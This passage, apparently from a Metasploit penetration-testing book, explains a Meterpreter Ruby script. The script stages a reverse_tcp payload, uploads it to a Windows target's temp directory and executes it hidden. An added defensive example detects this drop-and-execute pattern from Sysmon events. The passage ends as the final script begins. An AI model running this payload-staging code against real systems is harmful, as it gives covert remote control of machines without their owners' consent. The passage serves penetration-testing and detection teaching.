246

Chapter 16

mul.datastore['PAYLOAD'] = payload
mul.datastore['EXITFUNC'] = 'process'
mul.datastore['ExitOnSession'] = true
mul.exploit_simple(
    'Payload'  => mul.datastore['PAYLOAD'],
    'RunAsJob' => true
)

We define our payload as a windows/meterpreter/reverse_tcp, generate the payload by calling client.framework.payloads.create(payload), and specify the necessary parameters to create the multi-handler. These are all the required fields we need to set our payload using the LHOST and LPORT options and create a listener.

Next we create our executable (win32pe meterpreter), upload it to our target machine, and execute it:

if client.platform =~ /win32|win64/
    # Resolve the target user's %TEMP% directory on the remote system
    tempdir = client.fs.file.expand_path("%TEMP%")

    print_status("Uploading meterpreter to temp directory...")
    # pay was created earlier with client.framework.payloads.create(payload)
    raw = pay.generate
    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)

    # filename was defined earlier in the script
    tempexe = tempdir + "\\" + filename
    tempexe.gsub!("\\\\", "\\")
    fd = client.fs.file.new(tempexe, "wb")
    fd.write(exe)
    fd.close

    print_status("Executing the payload on the system...")
    execute_payload = "#{tempdir}\\#{filename}"
    pid = session.sys.process.execute(execute_payload, nil, {'Hidden' => true})
end

The variables called #{something} have already been defined within the script and will be called later. Notice that we already defined tempdir and filename. Moving into the script, we first include an if statement to detect whether the platform we are targeting is a Windows-based system; otherwise, the attack won't run. We then expand the temp directory on the target machine; this would be the equivalent of %TEMP%. Next we create a new file on the system and write out the new EXE we just generated from the ::Msf::Util::EXE.to_win32pe call. Remember that we set the session.sys.process.execute to Hidden so that the target user won't see anything pop up on his side.
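From the defender's side, the behavior the script above produces is a recognizable pattern: a new executable is written into the user's %TEMP% directory and launched from that same path a few seconds later. The following Ruby is an added example, not part of the book or of Metasploit, showing how that pattern can be correlated from endpoint events. The event records are constructed, simplified stand-ins for Sysmon FileCreate (Event ID 11) and ProcessCreate (Event ID 1) records; the TEMP_DIR_RE pattern, the 300-second window and the SAMPLE_EVENTS data are assumptions chosen for the illustration.

```ruby
# Added example (not from the book or Metasploit): flag executables that were
# written into a temp directory and then executed from it shortly afterwards.
require 'time'

# Paths under the per-user temp directory or the system temp directory (assumed).
TEMP_DIR_RE = %r{\\(?:AppData\\Local\\Temp|Windows\\Temp)\\}i
# Maximum seconds between the file being written and being executed (assumed).
WINDOW_SECONDS = 300

# events: array of hashes with :event_id (11 = file create, 1 = process create),
# :utc_time, and either :target_filename (ID 11) or :image (ID 1).
# Returns the process-create events whose image lives under a temp directory
# and was written by a file-create event within WINDOW_SECONDS beforehand.
def drop_and_execute_hits(events)
  creates = events.select { |e| e[:event_id] == 11 }
  events.select { |e| e[:event_id] == 1 }.select do |proc_ev|
    next false unless proc_ev[:image] =~ TEMP_DIR_RE
    t_exec = Time.parse(proc_ev[:utc_time])
    creates.any? do |c|
      c[:target_filename].casecmp?(proc_ev[:image]) &&
        (t_exec - Time.parse(c[:utc_time])).between?(0, WINDOW_SECONDS)
    end
  end
end

# Constructed sample events: one drop-and-execute sequence, one ordinary
# program launch, and one temp-directory executable run hours after creation.
SAMPLE_EVENTS = [
  { event_id: 11, utc_time: '2024-01-15T10:00:01Z',
    target_filename: 'C:\Users\alice\AppData\Local\Temp\agent_12345.exe' },
  { event_id: 1,  utc_time: '2024-01-15T10:00:04Z',
    image: 'C:\Users\alice\AppData\Local\Temp\agent_12345.exe',
    parent_image: 'C:\Windows\explorer.exe' },
  { event_id: 1,  utc_time: '2024-01-15T10:05:00Z',
    image: 'C:\Program Files\Git\bin\git.exe',
    parent_image: 'C:\Windows\explorer.exe' },
  { event_id: 11, utc_time: '2024-01-15T09:00:00Z',
    target_filename: 'C:\Users\alice\AppData\Local\Temp\installer.exe' },
  { event_id: 1,  utc_time: '2024-01-15T12:00:00Z',
    image: 'C:\Users\alice\AppData\Local\Temp\installer.exe',
    parent_image: 'C:\Windows\explorer.exe' },
]

if __FILE__ == $0
  drop_and_execute_hits(SAMPLE_EVENTS).each do |hit|
    puts "drop-and-execute: #{hit[:image]} at #{hit[:utc_time]}"
  end
end
```

Only the agent_12345.exe launch is reported: git.exe is not under a temp directory, and installer.exe was executed three hours after it was written, outside the correlation window. In a real deployment the window and the directory list would be tuned to the environment, and the file-create event's writing process would be a useful extra field to carry along.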

Putting this all together, our final script should look something like this:

# Meterpreter script for uploading and executing another meterpreter exe

info = "Simple script for uploading and executing an additional meterpreter payload"

#
# Options